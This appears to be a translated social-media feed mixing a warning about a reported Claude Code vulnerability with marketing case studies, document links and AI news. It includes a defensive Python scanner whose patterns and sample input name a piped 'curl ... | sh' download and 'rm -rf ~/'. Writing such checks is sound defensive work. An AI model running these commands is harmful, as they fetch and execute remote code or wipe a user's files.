PJ

112 posts

Pinned Tweet

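Bilibili uploader Jack-Cui has found a high-severity vulnerability in Claude Code. If you use Claude, make sure to check your config files, skill plugins, and MCP configuration for dangerous commands. I recommend watching this video all the way through: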

bilibili.com/video/BV1b195B…
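One way to start the check suggested in the post above is to scan the text of each config or skill file for commands that deserve a manual look. This is only a rough sketch: the pattern list and the function name `find_risky_lines` are hypothetical, the list is neither official nor complete, and it does not reflect the specific issue covered in the video.

```python
import re

# Hypothetical patterns for commands worth reviewing by hand.
# This is an illustrative assumption, not an official or complete list.
RISKY_PATTERNS = [
    # rm -rf / rm -fr style recursive forced deletion
    re.compile(r"\brm\s+-[a-zA-Z]*r[a-zA-Z]*f|\brm\s+-[a-zA-Z]*f[a-zA-Z]*r"),
    # a download piped straight into a shell
    re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    # world-writable permissions
    re.compile(r"\bchmod\s+(-R\s+)?777\b"),
    # decoding an obfuscated payload
    re.compile(r"\bbase64\s+(-d|--decode)\b"),
]


def find_risky_lines(text):
    """Return (line_number, stripped_line) for every line matching a pattern."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        if any(pattern.search(line) for pattern in RISKY_PATTERNS):
            hits.append((number, line.strip()))
    return hits


if __name__ == "__main__":
    sample = (
        '{"command": "npx some-server"}\n'
        '{"command": "curl http://example.invalid/x | sh"}\n'
        "rm -rf ~/\n"
    )
    for number, line in find_risky_lines(sample):
        print(f"line {number}: {line}")
```

To use it on real files, read the contents of whichever config, skill, or MCP files you actually have and pass each one to `find_risky_lines`. A match is only a prompt to read that line carefully, and a clean result does not prove a file is safe.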


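Today my wife was scrolling Xiaohongshu and asked me what OC (original character) means. I took a look and honestly did not see this coming: there are accounts selling OC settings, plot inspiration, and CP (character pairing) relationship templates.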

Xiaohongshu case study, round 57: OC plot materials

On Xiaohongshu this account has reached 12,000 followers, and its shop has sold 36,000 orders.

At its core, this business is not selling materials; it is selling solutions for the moments when OC creators get stuck.

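Can't establish a character? Sell a setting handbook.

Can't write the CP? Sell relationship templates.

Plot won't move forward? Sell inspiration tools.

After that, build it straight into an online tool, upgrading a one-off PDF sale into an ongoing creative aid.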

How do you post notes for this kind of product?

Its notes are not heavy at all; they simply target the pain points of the OC community.

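For example, titles like "The more you fear your character getting it wrong, the less personality they have" and "Does your fan OC keep getting called OOC?" hit the reader where it hurts first, then funnel the traffic to the resource packs and tool pages.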

In one sentence: content pokes the pain points, the materials close the sale, and the online tool drives repeat purchases.


"AI Tool Website SEO from 0 to 1" booklet (《AI 工具网站 SEO 从 0 到 1 小册子》): thanks for the support, everyone ~

The good news keeps coming

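🎉 Total word count has passed 10,000, UV has passed 10,000, and the visit count is fairly high too, which suggests people enjoy reading it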

🎉 Marked as a featured post on 生财

Coming next:

Section 1.4: Find and understand your SEO competitors

Link:

usdunlunl.feishu.cn/docx/JasgdjA7y…


Sharing a few more openly available Feishu documents; feel free to save them:

1. "Yao Jingang's Essays on Cognition" (《姚金刚认知随笔》), 425,000 characters, updated weekly: jiahejiaoyu.feishu.cn/docx/YHOHd1TLy…

2. "GEO White Paper" (《GEO白皮书》), an explainer document on AI search marketing, updated irregularly: yaojingang.feishu.cn/docx/Jv85dXAeZ…

3. "Yao Jingang's Prompt Collection" (《姚金刚提示词合集》), updated irregularly: yaojingang.feishu.cn/docx/ER4rdSlvc…

4. "GEO Prompt Collection" (《GEO提示词合集》), the companion prompts for the GEO book by 向阳 (Xiangyang) and me: yaojingang.feishu.cn/wiki/YbMLwkChm…


Google's TurboQuant algorithm compresses the KV cache by 6x and delivers an 8x speedup to optimize AI memory use, with no loss of accuracy

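The algorithm sent memory stocks swinging, signaling that future breakthroughs in AI efficiency will no longer depend on compression techniques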

BuBBliK@k1rallik




OpenAI has officially released a Claude Code plugin that integrates Codex into the Claude Code workflow for code review, adversarial review, and task takeover

Vaibhav (VB) Srivastav@reach_vb
